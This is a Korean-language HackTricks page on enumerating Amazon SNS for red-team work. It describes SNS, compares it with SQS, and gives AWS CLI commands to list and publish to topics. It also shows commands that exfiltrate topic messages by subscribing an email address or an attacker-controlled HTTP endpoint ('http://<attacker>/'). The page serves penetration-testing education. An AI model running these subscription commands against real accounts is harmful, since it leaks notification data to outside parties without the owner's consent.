AWS - SNS Enum

htARTE (HackTricks AWS Red Team 전문가)를 통해 **제로부터 영웅까지 AWS 해킹 배우기**!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 PDF로 HackTricks 다운로드하려면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
해킹 트릭을 공유하려면 PR을 HackTricks 및 HackTricks Cloud 깃허브 저장소에 제출하세요.

SNS

Amazon Simple Notification Service (Amazon SNS)은 완전 관리형 메시징 서비스로 설명됩니다. 응용 프로그램 간 통신 (A2A) 및 응용 프로그램-사용자 (A2P) 통신 유형을 모두 지원합니다.

A2A 통신의 주요 기능에는 발행/구독 (pub/sub) 메커니즘이 포함됩니다. 이러한 메커니즘은 주제를 도입하여 고처리량, 푸시 기반, 다대다 메시징을 가능하게 합니다. 이 기능은 분산 시스템, 마이크로서비스 및 이벤트 주도 서버리스 아키텍처가 관련된 시나리오에서 매우 유리합니다. 이러한 주제를 활용하면 발행자 시스템이 메시지를 다양한 구독자 시스템에 효율적으로 분배하여 팬아웃 메시징 패턴을 용이하게 할 수 있습니다.

SQS와의 차이점

SQS는 큐 기반 서비스로, 메시지가 단일 소비자에 의해 처리되도록 보장하는 포인트 투 포인트 통신을 허용합니다. 적어도 한 번의 전달을 제공하며, 표준 및 FIFO 큐를 지원하며 재시도 및 지연 처리를 위한 메시지 보유를 허용합니다. 반면 SNS는 발행/구독 기반 서비스로, 메시지를 여러 구독자에 동시에 방송하여 일대다 통신을 가능하게 합니다. 이메일, SMS, 람다 함수 및 HTTP/HTTPS와 같은 다양한 구독 엔드포인트를 지원하며, 대상 메시지 전달을 위한 필터링 메커니즘을 제공합니다. 두 서비스 모두 분산 시스템 구성 요소 간의 디커플링을 가능하게 하지만, SQS는 대기열 통신에 중점을 두고 있으며, SNS는 이벤트 주도 및 팬아웃 통신 패턴에 중점을 둡니다.

열거

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

주제가 FIFO 유형인 경우에는 SQS 프로토콜을 사용하는 구독자만 사용할 수 있습니다(HTTP 또는 HTTPS는 사용할 수 없음).

또한 --topic-arn에 지역이 포함되어 있더라도 올바른 지역을 **--region**에 지정해야 합니다. 그렇지 않으면 액세스 권한이 없다는 오류가 발생할 수 있지만 실제 문제는 지역 설정입니다.

참고 자료

https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 PDF로 다운로드하려면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구입하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 디스코드 그룹 또는 텔레그램 그룹에 가입하거나 트위터** 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

前へAWS - SES Enum 次へAWS - SQS Enum

最終更新 2 か月前

SNS

SQS와의 차이점

열거

인증되지 않은 액세스

권한 상승

후반 공격

지속성

참고 자료